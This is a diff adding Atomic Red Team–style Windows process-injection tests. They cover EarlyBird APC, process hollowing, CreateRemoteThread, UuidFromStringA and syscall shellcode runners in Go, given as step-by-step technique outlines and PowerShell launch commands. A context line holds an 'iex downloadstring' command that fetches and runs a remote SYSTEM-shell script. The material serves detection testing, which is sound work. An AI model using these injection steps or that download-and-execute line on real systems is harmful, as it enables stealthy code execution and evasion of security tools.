+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -33957,6 +34491,60 @@ privilege-escalation:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
       modified: '2023-04-07T17:13:54.168Z'
@@ -39913,6 +40501,25 @@ execution:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
         name: powershell
+    - name: Run Shellcode via Syscall in Go
+      auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c
+      description: |
+        Runs shellcode in the current running process via a syscall.
+
+        Steps taken with this technique
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Use syscall to execute the entrypoint of the shellcode
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1106\\bin\\x64\\syscall.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.009:
     technique:
       modified: '2023-04-14T18:04:54.607Z'
diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md
index 314c50c9..cba26796 100644
--- a/atomics/T1055.004/T1055.004.md
+++ b/atomics/T1055.004/T1055.004.md
@@ -12,6 +12,10 @@ Running code in the context of another process may allow access to the process's
 
 - [Atomic Test #1 - Process Injection via C#](#atomic-test-1---process-injection-via-c)
 
+- [Atomic Test #2 - EarlyBird APC Queue Injection in Go](#atomic-test-2---earlybird-apc-queue-injection-in-go)
+
+- [Atomic Test #3 - Remote Process Injection with Go using NtQueueApcThreadEx WinAPI](#atomic-test-3---remote-process-injection-with-go-using-ntqueueapcthreadex-winapi)
+
 
 <br/>
 
@@ -66,4 +70,97 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - EarlyBird APC Queue Injection in Go
+Creates a process in a suspended state and calls QueueUserAPC WinAPI to add a UserAPC to the child process that points to allocated shellcode. 
+ResumeThread is called which then calls NtTestAlert to execute the created UserAPC which then executes the shellcode.
+This technique allows for the early execution of shellcode and potentially before AV/EDR can hook functions to support detection.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+- References: 
+  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/
+  - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 73785dd2-323b-4205-ab16-bb6f06677e14
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process to spawn | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+Uses the undocumented NtQueueAPCThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode. 
+Since the shellcode is loaded and executed in the current process it is considered local shellcode execution.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Get a handle to the current thread
+5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
+- References:
+  - https://repnz.github.io/posts/apc/user-apc/
+  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html
+  - https://0x00sec.org/t/process-injection-apc-injection/24608
+  - https://twitter.com/aionescu/status/992264290924032005
+  - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4cc571b1-f450-414a-850f-879baf36aa06
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md
index b94f8aa9..67394110 100644
--- a/atomics/T1055.012/T1055.012.md
+++ b/atomics/T1055.012/T1055.012.md
@@ -12,6 +12,10 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
 
 - [Atomic Test #2 - RunPE via VBA](#atomic-test-2---runpe-via-vba)
 
+- [Atomic Test #3 - Process Hollowing in Go using CreateProcessW WinAPI](#atomic-test-3---process-hollowing-in-go-using-createprocessw-winapi)
+
+- [Atomic Test #4 - Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)](#atomic-test-4---process-hollowing-in-go-using-createprocessw-and-createpipe-winapis-t1055012)
+
 
 <br/>
 
@@ -107,4 +111,86 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Process Hollowing in Go using CreateProcessW WinAPI
+Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hollow_binary_path | Path of the binary to hollow | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| hollow_process_name | Name of the process to hollow | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+allows for the retrieval of output generated from executed shellcode.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 94903cc5-d462-498a-b919-b1e5ab155fee
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hollow_binary_path | Path of the binary to hollow | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| hollow_process_name | Name of the process to hollow | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 5fde8c34..8b510a6b 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -18,6 +18,20 @@ More sophisticated samples may perform multiple process injections to segment mo
 
 - [Atomic Test #5 - Read-Write-Execute process Injection](#atomic-test-5---read-write-execute-process-injection)
 
+- [Atomic Test #6 - Process Injection with Go using UuidFromStringA WinAPI](#atomic-test-6---process-injection-with-go-using-uuidfromstringa-winapi)
+
+- [Atomic Test #7 - Process Injection with Go using EtwpCreateEtwThread WinAPI](#atomic-test-7---process-injection-with-go-using-etwpcreateetwthread-winapi)
+
+- [Atomic Test #8 - Remote Process Injection with Go using RtlCreateUserThread WinAPI](#atomic-test-8---remote-process-injection-with-go-using-rtlcreateuserthread-winapi)
+
+- [Atomic Test #9 - Remote Process Injection with Go using CreateRemoteThread WinAPI](#atomic-test-9---remote-process-injection-with-go-using-createremotethread-winapi)
+
+- [Atomic Test #10 - Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)](#atomic-test-10---remote-process-injection-with-go-using-createremotethread-winapi-natively)
+
+- [Atomic Test #11 - Process Injection with Go using CreateThread WinAPI](#atomic-test-11---process-injection-with-go-using-createthread-winapi)
+
+- [Atomic Test #12 - Process Injection with Go using CreateThread WinAPI (Natively)](#atomic-test-12---process-injection-with-go-using-createthread-winapi-natively)
+
 
 <br/>
 
@@ -287,4 +301,326 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Process Injection with Go using UuidFromStringA WinAPI
+Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA.
+With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread 
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)
+- References: 
+  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
+  - https://twitter.com/_CPResearch_/status/1352310521752662018
+  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2315ce15-38b6-46ac-a3eb-5e21abef2545
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Process Injection with Go using EtwpCreateEtwThread WinAPI
+Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process.
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call EtwpCreateEtwThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)
+- References: 
+  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3
+  - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7362ecef-6461-402e-8716-7410e1566400
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Remote Process Injection with Go using RtlCreateUserThread WinAPI
+Executes shellcode in a remote process.
+
+Steps taken with this technique
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
+- References: 
+  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a0c1725f-abcd-40d6-baac-020f3cf94ecd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Remote Process Injection with Go using CreateRemoteThread WinAPI
+Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+Steps taken with this technique
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+ - References:
+  - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 69534efc-d5f5-4550-89e6-12c6457b9edd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Process Injection with Go using CreateThread WinAPI
+This program executes shellcode in the current process using the following steps
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call CreateThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2871ed59-3837-4a52-9107-99500ebc87cb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Process Injection with Go using CreateThread WinAPI (Natively)
+This program executes shellcode in the current process using the following steps
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call CreateThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2a3c7035-d14f-467a-af94-933e49fe6786
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md
index 7e9c6e22..0aae7282 100644
--- a/atomics/T1106/T1106.md
+++ b/atomics/T1106/T1106.md
@@ -20,6 +20,8 @@ Adversaries may use assembly to directly or in-directly invoke syscalls in an at
 
 - [Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique](#atomic-test-4---winpwn---get-system-shell---pop-system-shell-using-namedpipe-impersonation-technique)
 
+- [Atomic Test #5 - Run Shellcode via Syscall in Go](#atomic-test-5---run-shellcode-via-syscall-in-go)
+
 
 <br/>
 
@@ -152,4 +154,44 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Run Shellcode via Syscall in Go
+Runs shellcode in the current running process via a syscall.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Use syscall to execute the entrypoint of the shellcode
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ae56083f-28d0-417d-84da-df4242da1f7c
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1106\bin\x64\syscall.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>